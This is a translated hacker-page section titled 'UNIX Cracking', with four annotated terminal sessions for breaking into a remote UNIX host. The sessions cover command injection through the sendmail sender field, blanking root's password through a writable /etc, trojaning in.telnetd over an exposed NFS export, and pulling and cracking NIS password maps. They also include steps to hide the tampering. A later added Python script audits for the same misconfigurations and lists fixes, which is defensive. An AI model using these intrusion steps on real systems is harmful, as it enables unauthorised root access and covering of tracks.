9. UNIX Cracking
Example No. 1.
crack% telnet target.remote.com 25
Connecting to 123.456.654.321.
! we connect to port 25 - that is SMTP
220 sendmail SMI/4.3.5.2 ready
! this version, as we know, has a bug.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.rhosts@target.remote.com
! we put a command in place of the return address.
200 Sender ok.
rcpt to: nosuchuser
! we enter a deliberately invalid recipient
500 nosuchuser: user unknown
! ignoring the message, we continue the dialogue.
data
230 Enter mail, end with .
200 Mail accepted
! that's it, the machine is cracked....
quit
crack% su
! now we get in so that we are not visible in who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#
Example No. 2.
crack# su - bin
$ rsh target.remote.com /bin/csh -i
! The file /etc/hosts.equiv contains a + entry, and that is a mistake...
Welcome to remote.com!
! The /etc directory is owned by bin...
Warning! No access to terminal, job control disabled!
% ls -ldg /etc
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/
% cd /etc
! We make it so that we can edit passwd ...
% mv passwd passwd.was
% cp passwd.was passwd
! we edit it
% ed passwd
2341
1p
root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh
s/Nkkh5gkljGyj//p
root::0:0:Root:/:/bin/csh
w
2341
q
! And we are superuser.
% echo /bin/csh -i | su root
Warning! No access to terminal, job control disabled!
target# mv /etc/passwd.was /etc/passwd
! So that nobody notices what we did.
Example No. 3.
crack% showmount -e target.remote.com
Export list for target.remote.com
/home Everyone
/disk3 neptun pluton alpha
! The home directories are accessible over NFS
crack% su
# mount -t nfs target.remote.com:/home /mnt
# cd /mnt
! We mount the directory on our side
# ls -ldg *
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/
# echo crack.edu user/.rhosts
! We install a .rhosts for the users
# cat /etc/passwd
user::257:20::/:
^D
! we create the same user on our side
# su - user
! We become that user
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
! And we go for a visit -)
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! The directory is writable
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
! We found a program that will be run
! as root from our directory
% cd /usr/etc
% mv in.telnetd in.telnetd1
! we create a trojan
% cat in.telnetd
#!/bin/sh
exec /bin/csh -i
^D
% chmod 755 in.telnetd
! and we launch it
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
# chown user /etc;
! We make /etc ours
^M: command not found
# exit;
^M: command not found
Connection closed by foreign host.
% cd /etc
! and from here on as in Example No. 1.
........
Example No. 4.
! we check whether NIS is present
crack% rpcinfo -p target.remote.com | grep bind
120000 2 udp 2493 ypbind
! there is such a thing ....
crack% ypx -o target.passwd -g target.remote.com
! we take the password file
crack% crack target.passwd
! we run the password finder
[ a lot of time ]
OK, user user has password iamuser
! found it, we log in
crack% telnet target.remote.com
! from here on everything is as in the previous example.
......
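Seen from the administrator's side, Examples 2 and 3 depend on a handful of settings that can be checked from copies of the files and command output shown in the listings. The script below is an added example, not part of the original text; the function names and the sample data are assumptions constructed from those listings.

```python
# Added example (not from the original page): audit for the settings Examples 2 and 3 rely on.

def parse_ls(ls_text):
    """Map directory -> (mode, owner) from `ls -ldg` lines as shown on the page."""
    rows = (line.split() for line in ls_text.splitlines())
    return {f[-1].rstrip("/") or "/": (f[0], f[2])
            for f in rows if len(f) >= 8 and len(f[0]) >= 10 and f[0][0] == "d"}

def unsafe_dir(mode, owner):  # not owned by root, or writable by group or others
    return owner != "root" or mode[5] == "w" or mode[8] == "w"

def audit(hosts_equiv, passwd, showmount, inetd_conf, ls_text):
    findings = []
    # Example 2: a "+" line in hosts.equiv trusts every remote host.
    if any(l.split("#")[0].strip() == "+" for l in hosts_equiv.splitlines()):
        findings.append("hosts.equiv: '+' trusts all hosts")
    # Examples 2 and 3: accounts whose password field is empty.
    for f in (l.split(":") for l in passwd.splitlines()):
        if len(f) >= 7 and f[1] == "":
            findings.append(f"passwd: empty password for {f[0]}")
    # Example 3: a file system exported to everyone.
    for f in (l.split() for l in showmount.splitlines()):
        if len(f) >= 2 and f[0].startswith("/") and f[1].lower() == "everyone":
            findings.append(f"nfs: {f[0]} exported to everyone")
    # Examples 2 and 3: system directories a non-root account can modify.
    dirs = parse_ls(ls_text)
    for path, (mode, owner) in sorted(dirs.items()):
        if unsafe_dir(mode, owner):
            findings.append(f"dir: {path} owner={owner} mode={mode}")
    # Example 3: inetd starts a root service from such a directory.
    for f in (l.split("#")[0].split() for l in inetd_conf.splitlines()):
        srv = next((i for i, x in enumerate(f) if x.startswith("/")), 0)
        parent = f[srv].rsplit("/", 1)[0] if srv else ""
        if srv and f[srv - 1] == "root" and parent in dirs and unsafe_dir(*dirs[parent]):
            findings.append(f"inetd: root service {f[0]} runs from {parent}")
    return findings

# Constructed sample input, modelled on the listings in Examples 2 and 3.
SAMPLE = dict(
    hosts_equiv="# trusted hosts\n+\n",
    passwd="root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh\nuser::257:20::/:\n",
    showmount="/home Everyone\n/disk3 neptun pluton alpha\n",
    inetd_conf="telnet stream nowait root /usr/etc/in.telnetd in.telnetd\n",
    ls_text="drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/\n"
            "drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc\n",
)

if __name__ == "__main__":
    print("\n".join(audit(**SAMPLE)))
```

Every finding maps to a fix: remove the + entry, lock or set the password, restrict the export to named hosts, and give system directories to root with no group or other write permission.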
- Hex -
(examples taken, translated, written, bla bla bla, the result is in front of you)
These methods are fairly old and among the most primitive, but ... heh,
get to know the principle, because there are people who cannot even imagine
how such things are done and who ask questions like ... roughly, what
program do you crack with? ;\
Informacion rulez and if u rule information .....
® 2002-2003 VaidaZ